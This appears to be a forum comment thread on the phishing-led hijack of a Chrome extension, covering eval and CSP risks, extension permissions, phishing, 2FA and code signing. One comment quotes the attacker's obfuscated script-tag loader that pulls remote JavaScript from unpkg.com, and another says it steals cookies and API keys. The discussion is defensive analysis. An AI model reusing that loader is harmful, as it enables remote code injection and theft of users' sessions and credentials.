I am guessing the extension had a "content_security_policy" key in its manifest, with an 'unsafe-eval' CSP directive in its value?
Any extension that declares such a CSP directive in its manifest should be presumed malicious until a thorough investigation proves otherwise.
An 'unsafe-eval' directive in a manifest essentially gives an extension the ability to execute arbitrary code in the extension context, code which can't be reviewed by reading the source files.
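For reference, this is roughly what the relaxed policy looks like in a (Manifest V2) manifest.json; when the key is absent the default is script-src 'self'; object-src 'self', which blocks eval() entirely:

```json
{
  "name": "Example extension",
  "version": "1.0",
  "manifest_version": 2,
  "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'"
}
```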
"User-Agent Switcher for Google Chrome" is confirmed to have an 'unsafe-eval' directive in its manifest.
So I guess the suspicion should be extended to any extension declaring a "content_security_policy" key in its manifest.
It would seem obvious that the moment a script tries to load arbitrary code outside of the package, it should fail.
Generated code is code that's outside of the package.
There are also a few (keyword: FEW) valid reasons for using eval in situations where it's beneficial to pull updates and modules from a known and trusted location.
In those cases though, if you're not signing server side and validating signatures in the extension with a pre-shared cert, you've still got problems (single MITM attack can compromise your extension going forward).
Long story short, eval is still a very useful feature. It needs to be used properly, and it should be used rarely, but it's incredibly powerful, and lots of things you don't really think about suddenly stop working if it goes away.
And yet this is Mozilla's stance regarding extensions pulling code from outside the extension's own package:
> extensions with 'unsafe-eval', 'unsafe-inline', remote script, or remote sources in their CSP are not allowed for extensions listed on addons.mozilla.org due to major security issues.
This is the sane stance in my opinion, with the best interests of users at heart.
I would like to be shown an actual, real case of why eval() would be impossible to avoid for an extension, not just a theorized one with no real sensible and convincing example. As much as I try, I can't come up with any such scenario.
I mostly agree with you, eval is dangerous and often improperly used, but it's ALSO an incredible tool.
The complete opposite of your argument is languages that are homoiconic (https://en.wikipedia.org/wiki/Homoiconicity): they're built in a way that explicitly allows manipulation, even of the language itself, as a FEATURE.
They include languages like Lisp/Clojure/Julia.
Worse, many of the ways to "work" around the lack of eval just reduce the attack surface, or make the attack considerably less likely (obfuscation not security!).
Simple case: You need to apply certain policies to certain sites, those policies vary based on the browser in use, the country of origin of the user, and the country the site is hosted in.
The way that those policies vary... ALSO varies. As new legislation is passed, or corporate policies change, or certain countries become more or less stable.
A (completely valid) way to solve this problem would be to send both a policy engine and a policy set to the extension. The policy engine is eval'd and runs the policy set.
That allows real-time updates to the deployed extension's ability to parse new policies. Not just different data in the policies, mind you, but actual new policy capabilities.
Do you have to use eval? Nope, sure don't. You can generate a custom EBNF (hell, why not just use the EBNF for ECMAScript), write your own freaking engine, and run it. All without eval. But you're still just running eval. You just get to name it something nicer, introduce an incredible amount of overhead to recreate a feature someone has already provided, and generally get less performant results.
Or, you can just fucking sign the payload with a pinned cert and verify on the client, and get the same guarantees for security you have with HTTPS to begin with.
1. It's the de-facto language for the web, which both drastically increases the number of inexperienced developers, as well as the total attack surface.
2. Again, as a scripting language for browsers, parsing untrusted user input is a common need. Eval filled the need for parsing, but not the need for trust.
You can absolutely use eval in entirely safe ways. Most people don't, and doing so (especially in JS) is hard. That's because JS has made establishing trust hard. Juuuuust recently, with the introduction of some of the webcrypto work, and the rapid rise of ubiquitous https are we really getting to the point where doing so is really feasible at all.
I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change. Primarily, immutability. I'm thinking of something like an IPFS repo which is "elsewhere", but still very much crawl-able, scannable for bad stuff (Turing issues aside...), and can be shown to reproduce content if it is broken.
Using an immutable, self-certifying system would also solve the second point, regarding the single MITM. The trust would be with the file/package, and not some ephemeral cert (whose trust is brokered from above).
But there are lots of times when the final result is much more valuable when the code CAN change.
You just have to have trust.
1. Trust that the folks who can change the code aren't malicious.
2. Trust that the code you think you're running is really the code you're running.
Neither of those things are really too much of a stretch. And the services and capabilities they allow are very, very nice.
Hell, statistically speaking... we're both typing these comments in Google Chrome, a browser that auto-updates itself all the time.
but 1. we trust that Google won't suddenly become malicious and 2. we trust the mechanisms in place (https, cert pinning) to ensure the update is really the update Google sent.
In fact, this whole article actually boils down to a breakdown of trust: Turns out random extension devs aren't as trustworthy as we might like. They make mistakes and there's no safety net.
I'm not sure if extensions also have the capability to capture the https body info, but I erred on the safe side and also changed passwords.
Seriously? Who trusts the Chrome store or the Android store for that matter? If you've ever once submitted an app and seen how loose the security is, I can't see how you'd have any faith in their system.
I've seen that somewhere else; is it just for obfuscation? Or is there some other reason for it?
Maybe it might fool some automated analyzers though.
- If the string is Base64 encoded
- Output the decoded string
With no recursion for an iterated check of any sort of nested encoding.
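The iterated check being asked for could look something like this hedged sketch (Node-flavored; the function name and heuristics are made up for illustration, not production-grade analysis):

```javascript
// Keep decoding while the string still looks like Base64, instead of
// stopping after one pass like the single-shot check described above.
function deepDecode(s, maxDepth = 10) {
  const b64 = /^[A-Za-z0-9+/]+={0,2}$/;
  for (let i = 0; i < maxDepth; i++) {
    if (s.length % 4 !== 0 || !b64.test(s)) break;
    const decoded = Buffer.from(s, 'base64').toString('utf8');
    if (!/^[\x20-\x7e\s]*$/.test(decoded)) break; // stop at non-printable output
    s = decoded;
  }
  return s;
}
```

Run against a doubly-encoded payload, this unwraps both layers; a single-pass check stops after the first.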
"lkmofgnohbedopheiphabfhfjgkhfcgf" is the identifier for the user-agent extension I've been using for a while, and looking at the code, it's very straightforward and not spying on anything. It has not been updated since 2013 (and the website listed for the dev, www.toolshack.com, is not online), so I'm guessing a lot of users just go with other extensions that have received updates.
BTW, Google itself offers a similar extension at 120KB called "User-Agent Switcher for Chrome" (not "... for Google Chrome") here: https://chrome.google.com/webstore/detail/user-agent-switche...
Is there any way to confirm that this is actually from google though, and not just some 3rd party who chose their publisher name as "google.com"? Most official google extensions have a "by google" badge in the right hand column whereas this one lacks it.
Now, is that trustworthy or not? Good question.
This just has the 'offered by google.com'. I would have assumed a 'By Google' logo would have been added after acquisition?
Of course, forgeable as well.
I've sent an email to his anonymized domain registrant contact to see if he can do anything about his malicious competitor.
So we have a web store that average Chrome users think is "safe," especially when apps have high review scores, and no meaningful ability to report malware to Google or to the users. Nice.
Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.
For example, I made an extension that, upon a certain keyboard shortcut, saves the current page in a specific bookmarks folder. Currently Chrome's permissions model completely fails here, you need to request full access to all user data, everywhere, indefinitely.
Which would be better, (a) granting full indefinite access to the domain you're bookmarking most of the time you bookmark something, or (b) giving the extension permission only to see the current tab's URL and title, and to edit one specific bookmarks folder, and only during a keyboard shortcut's callback?
The granularity solution to your scenario would be to tie page-reading permissions to your triggering the extension, and have them removed with code execution end. So, now you don't need to worry about sensitive information that shows up on other domains, or your bank deciding to use a subdomain, or that one bank blog post that you actually do want it to see.
It requires a "deliberate, explicit user action" to run the extension on the page each time even if it asks for that permission. And if you really do want an extension enabled 24/7 (such as vimium), then you can select a check box in the extensions page which allows the extension to run without specifically enabling it each time.
Side note: Chrome appears to have moved Extensions out of Settings since I last looked, and the "search settings" bar doesn't bring it up either. Took me a few minutes to find how to get to them.
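The granularity being asked for half-exists today: Chrome's activeTab permission grants access to the current tab only on a user gesture, such as a keyboard command. A sketch of how the bookmark-on-shortcut extension's manifest might look (names are illustrative; note that the bookmarks permission is still all-or-nothing over the whole bookmark tree, which is exactly the gap being described):

```json
{
  "name": "Bookmark-on-shortcut (sketch)",
  "version": "1.0",
  "manifest_version": 2,
  "permissions": ["activeTab", "bookmarks"],
  "background": { "scripts": ["background.js"] },
  "commands": {
    "save-bookmark": {
      "suggested_key": { "default": "Ctrl+Shift+S" },
      "description": "Save the current tab to a specific bookmarks folder"
    }
  }
}
```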
AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?
Compare that to Firefox's model (at least, the old XUL model), where every extension essentially runs as the Firefox equivalent of "root".
But by making nearly every extension sound evil, even the ones that aren't, users get used to accepting every permission request, or not installing any extensions at all.
IMO the danger is worse with Chrome. At least with Firefox, you know that every extension can potentially be malicious. With Chrome, what happens is, you install an extension that has nice-sounding permissions. Then 3 months later, it gets sold to an ad/malware company, they push out a new version that reports every URL you visit to their server, and you see a popup saying that some extension needs more permissions. Maybe you notice it, maybe you think nothing of it--or maybe the browser window steals focus while you're typing and the OK button gets pressed without your even realizing it.
What I was hoping for was something along the lines of "<Download Extension> wants to access this page" (similar to the notification when a website tries to access your location) upon use. I've no idea if that's possible or not in the Chrome security model.
What we really, really need is the ability to jail (and tie to a different IP) a browser instance.
I want this so much that I am somewhat seriously considering learning the syntax of the vmware fusion command line tool so that I can quickly fire up a browser VM with just a command (and revert state to "clean" snapshot, etc.).
The problem, of course, is that this use-case is so compelling that in a short amount of time I would have 5 or 6 browser VMs running and now I am running out of memory ... it's silly to fire up an entire virtual machine just to run the browser.
However, the existing sandbox measures are not nearly enough. I want to do my banking from a different IP than I use google services from. Every day I want to wipe that OS to clean state and start over.
This is not an easy configuration. Even with an OS (FreeBSD, Solaris) that has jail it's not simple to locally interact with a GUI tool on your existing desktop that is actually in its own jail ...
First, it is excellent that you disclosed the issue.
Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.
Fix the process, not the people.
It's good that they're not throwing the poor person under the bus.
I agree with you. The email makes the situation appear as a process issue. Based upon the disclosure text, it seems quite possible the person wouldn't normally have clicked on an email text, but did so here based upon process.
The disclosure displayed the attitude that they shouldn't have expected to get phished. It's 2017. Lots of people get phished.
It's pretty straightforward to never click links that arrive in emails, and to never enter passwords into webpages that open on their own.
Of course there are technical ways to mitigate this specific attack, but it is more important not to excuse poor Internet hygiene after the fact.
Characterizing the act as "unlucky" is excusing language, just as bad as blaming language.
Assigning an error to mystical forces is unhelpful.
Simply stating that the person entered the password into a phishing site is not blaming language, it is factual.
The only real defense is to glance at the url bar every time you're about to enter your password. And even I find myself not doing that 100% of the time. It's a numbers game.
A policy of popping up a popup "glance at url bar" every time you copy your password from your password manager (which you're using, right?) would go a long way.
With Google specifically, the worst part is you really do have to look at the URL every single time you go to enter your password. And by that I mean that if you land on the login page, verify the URL, enter your password, submit, and get the error page saying you got the password wrong... you must check the URL again before re-entering your password.
Why? Because Google's login, by design - and repeatedly defended by them as being "acceptable" - allows redirecting off Google's properties after login. So hackers send you to the real Google login page, with a post-login redirect to a fake but perfect copy of the "wrong password, try again" page, where they then capture the passwords of people who mindlessly re-enter their password without double checking the URL a second time.
Most importantly, 2FA does not help you here. You'll enter a currently valid 2FA code on the hacker's site, and they will immediately use that code to actually log in to your account. Before you realize what is happening, you are already locked out of your account - new password, 2FA stripped or replaced, security questions changed, and all pre-existing sessions/devices wiped.
With i18n not even that: https://www.theguardian.com/technology/2017/apr/19/phishing-...
Benign POC: https://www.xn--80ak6aa92e.com/ (open it and it'll look like a normal "l" in the url box)
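The Punycode form is at least detectable programmatically; a hedged sketch (Node's URL parser keeps hostnames in their xn-- form, and the function name is made up for illustration):

```javascript
// Flag URLs whose hostname contains a Punycode (xn--) label, which is
// how IDN lookalike domains appear under the hood.
function hasPunycodeLabel(urlString) {
  const host = new URL(urlString).hostname;
  return host.split('.').some((label) => label.startsWith('xn--'));
}
```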
Do other password managers not do that?
Just curious, not trying to engage the bigger question of whether getting phished is the user's fault.
It alerts if you enter your google password anywhere but the real google sign in page.
I agree that any defense is far from perfect, but IT professionals shouldn't fall for an unsophisticated attack like this, even if they are not working in security. And I am not even talking about a web developer.
Now, there are two ways to deal with the situation. Demonize, or accept. The demonize/blame approach doesn't work.
The article clearly explains that "the bitly link was not directly visible in the phishing email, as it was an HTML-email."
Have I been able to convince a single customer (I run a computer services business) or friend to follow my lead? Nope, not a single one.
No. FIDO hardware 2fa works fine for this.
In my case everything looked normal at a glance. 2FA saved me, but if they had asked for 2FA I wouldn't have noticed.
Other people getting phished
I'm assuming from your tone of "I demand his head" that you were running the compromised extension, and wish to extract your pound of flesh from the person who compromised you. (EDIT: If not, what's your beef with them? Are you a competitor? Please explain!) This, too, is wrong. And here's why we don't play the blame game when it comes to human failures:
You chose to run a Chrome extension, from an untrusted source, with only machine automation vetting its contents and auto-update ensuring that you get the latest attack. Of course you got compromised. What else did you expect? How could you place ultimate trust for all content in your browser in the hands of an OCR extension?! What on earth could compel you to accept such a ridiculous risk in exchange for this?
Everyone's human, you included. They clearly stated and accepted responsibility for the incident. Now you need to stand up and accept responsibility for running unvetted code in your browser. (EDIT: Yes, it's machine-vetted. How's that working out for you?)
There's more than enough blame to ensure you get an equal portion. Being human is bad enough without people coming to destroy you because they'd rather not confront their own failures of judgement. Get over your immature desire to get your vengeance for being compromised and build a better approach to your own personal security.
If you use a password manager that auto-fills passwords, it is open to attack by a site or program that can fool it into thinking you have visited the site.
Any malicious extension, such as the one compromised here, has a good chance of being able to drain all your passwords.
You are probably safer, even with phishing threats, to paste it in from another program each time.
I doubt even pasting it in is completely secure.
Why would you click?
I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.
A similar thing happened with another Chrome extension Social Fixer about a month ago.
EDIT: It's already been blocked, nice work @mjackson
In fact, judging by the exploit code, I would guess the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.
In that scenario the author also didn't have 2FA enabled:
I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.
Best comment here
All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.
Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.
In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.
(Maybe there is some code signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)
Perhaps it was stored somewhere accessible by that account? Or accidentally packaged with the extension itself? If that were the case the spear phishing attack would make sense: someone scraping the Chrome store for extensions that contain a key file, then phishing their developer account credentials would be more efficient than phishing credentials without knowing beforehand whether you'd be able to get the private key and update the extension.
What's concerning to me is the section entitled "Uploading a previously packaged extension to the Chrome Web Store", which asks the user to place the private key into the package's root and include it in a zip. First: why? Why upload the private key? That leaks it to Google and on top of that stores it in multiple places; the user could forget to delete the zip (and do so securely), for example. And the private key in the root is probably a copy, so that has to be shredded too.
For updating the package, you select the project root as well. If you didn't remove your private key before doing so, I'm assuming you'd be releasing your key?
The first was Live HTTP Headers.
I have never had this experience on Firefox.
Is it simply a matter of Chrome being a bigger target?
I thought the attacker stole the account maliciously, but hadn't quite gotten around to inserting the malware by the time it was taken back.
I had strong suspicions that a certain webhost a new client of mine utilized was both prone to attack, and not very forthcoming when past attacks had occurred.
So when I loaded their own website one day and found it full of ads for russian pornography... I confirmed my own bias that the webhost had been hacked... deleted the account, and moved everything over to AWS.
Changed all the passwords, freaked out a bit, etc...
Then I realized that it was just the extension I was running that injected those ads... d'oh!
Obviously, for sites that support U2F (like Google), getting a YubiKey or any other U2F-compatible key would be the best protection against this.
I think OP agrees with you.
Actually - I disagree with this. You can no longer "glance" at the url bar to determine if you are on the right domain due to Unicode chars if you clicked a link.
The only safe way is to type the url yourself into the browser.
If it is a long link - then at least typing the base domain, and pasting the "rest" is probably safe?
Maybe IE is affected though. I haven't tested every browser. But it's a known security concern.
Why have you got such an old version of Chrome?
To answer your question, (1) it's pretty arduous to install Chrome from the AUR, and (2) I am wary of Google removing useful functionality from Chrome.
i don't get that logic. what's the difference between
Your adwords account was suspended due to suspected click fraud. [bunch of made up plausible reasons]. You may appeal by going to your adwords control panel [phishing link here]
Your adwords account was suspended. Click here to see why [phishing link here].
I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.
Seems we need to stop trusting email.
Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(
Sadly it is a bit overzealous: it flags a link whose text is, say, www.google.com but whose URL is www.google.com/ as malicious (the trailing slash means the text and URL don't exactly match, even though they resolve to the same place). Still, the idea seems sound. I'm surprised Gmail doesn't have something like this.
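Normalizing before comparing would kill that false positive; a toy sketch (the function name is made up, and the regexes are rough illustrations, not production URL parsing):

```javascript
// Compare a link's visible text to its actual href, normalizing
// trivial differences like scheme and trailing slash so that
// www.google.com vs www.google.com/ is no longer flagged.
function looksDeceptive(text, href) {
  const norm = (u) =>
    u.replace(/^https?:\/\//i, '').replace(/\/$/, '').toLowerCase();
  // Only compare when the visible link text itself looks like a URL.
  const urlish = /^(https?:\/\/)?[\w.-]+\.[a-z]{2,}(\/\S*)?$/i;
  if (!urlish.test(text.trim())) return false;
  return norm(text.trim()) !== norm(href);
}
```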
I use this in safari to bring it back: https://visnup.github.io/Minimal-Status-Bar/
> Sigh... totally agree. I could add a longer story why just this account had no 2FA enabled, but the lesson learned is simple: From now on, we enable 2FA for every account that offers it.
So they won't make this mistake again.
This whole 2FA thing has been really jarring for me, because I always treated my phone like a public space: no password, no private data (that I know of), ready for inspection by foreign authorities. Of all the things the world could ask me to trust, why the phone?
Because it's the only computer you can expect the majority of users to own and always have on them.
2FA as a thing would not get any reasonable adoption if you required people to buy hardware keys to use it. Not to mention, hardware keys do not work on every device one would like to log in from (AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in).
Using a USB OTG adapter, it should be possible. However, even Samsung's flagship tablets don't carry NFC, only the phones do - and even there it's hit and miss whether you have NFC.
Apple, on the other hand, doesn't have developer-accessible NFC anywhere.
This is a real shame.
U2F cannot be phished: the browser binds the signed challenge to the site's origin, so a response captured on a lookalike domain is useless on the real one.
What if I control the user's computer and can let my own code interact with U2F? Or does the protocol somehow prevent that?
So typical, unfortunately.
Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.
How it should work.
1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other access."
2. A web form people can submit revocation codes to, from anywhere with Internet access.
The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.
I personally would generate it using a Diceware-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy, of which one third is a recovery checksum.
This would let the developer write several words down wrong and still be able to disable their extension. If the recovery/checksum portion had to be used, I would show the user "You appear to have made a mistake, which we could correct. Is this the correct disable key?" along with the corrected version.
However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.
The above seems a bit grandiose of me so here is the comment where I first wrote about this:
If you want to change that, start contacting reporters from mainstream media. If this hits the New York Times or the Wall Street Journal, or at least Techdirt, Google might notice.
I am not personally an extension developer and don't run many.
It does explain so much. For example, all this work was put into a ridiculous, animated, moving, flashing new Gmail sign-in page that was pre-announced for weeks ("our sign-in page is changing!"), and after all that work it does not include even seven and a half minutes' worth of improvement by a developer. For example, I had to laugh and laugh after I realized it wasn't accepting my password because my caps lock was on.
I would expect a popup warning if you have your caps lock turned on while typing. Because, you know, that is one of literally like 3 things you can do to improve a sign-in page that is that dynamic and moving and flashing. There's just not much to improve.
All that flash and it doesn't do anything at all. Your comment gives a lot of insight as to why so I would like to understand this cultural shift.
how does management work at Google now?
* instant revocation -> attacker will just revoke the code
* delayed revocation where the code remains usable for some period -> accidental exposure is irrecoverable
Maybe it's viable as an option (extension owner takes on the risk of properly managing the secret, knowing it can't be revoked easily).
Revocation codes should revoke. A malicious employee or compromised gmail account should be able to disable an extension, yes. The developer should then have to work to reinstate it.
Extensions are not part of the core Chrome experience.
You are asking: "As a user, are you okay with Chrome extensions being disabled by Google if its developer had their revoke key compromised?"
Nobody would say "no".
Compare: "as a user, are you okay with Microsoft Windows locking and not booting, in case Microsoft's internal revoke key experienced a security issue?" (until Microsoft issues an update which unlocks it again.)
Most people would not want that, because people need to finish working on their things in this scenario. (Of course some ultra secure installations might want that, but most wouldn't.)
The difference is that these are small, third-party developers, working on extensions, not the core functionality.
I hope this answers your question regarding how I personally would handle exposed codes.
However, I am not an extension developer or heavy extension user! I am not saying this is the only solution.
They frequently remove it from the store when people notice and restore it a month or so later.
The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.
"var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';
Yeah, but what will you do when you receive an HTML-only mail, or a mail with a text/plain alternative saying "lol, get a better MUA", or a mail with a text/plain alternative so mangled it can't be read without making your brain hurt?
All these are common occurrences in automatically sent e-mails these days.
Thunderbird does this by default.
And that's exactly what phishers want you to do.
The lesson here is: never trust anyone or anything.
Which is why you should use 2FA and why you shouldn't trust someone who says they don't use it.
I find it interesting that most people who replied to your post were upset with you. The first maxim of programming is, "all input is evil." Good Internet Hygiene means not to click links in emails.
The world is an uphill kind of place.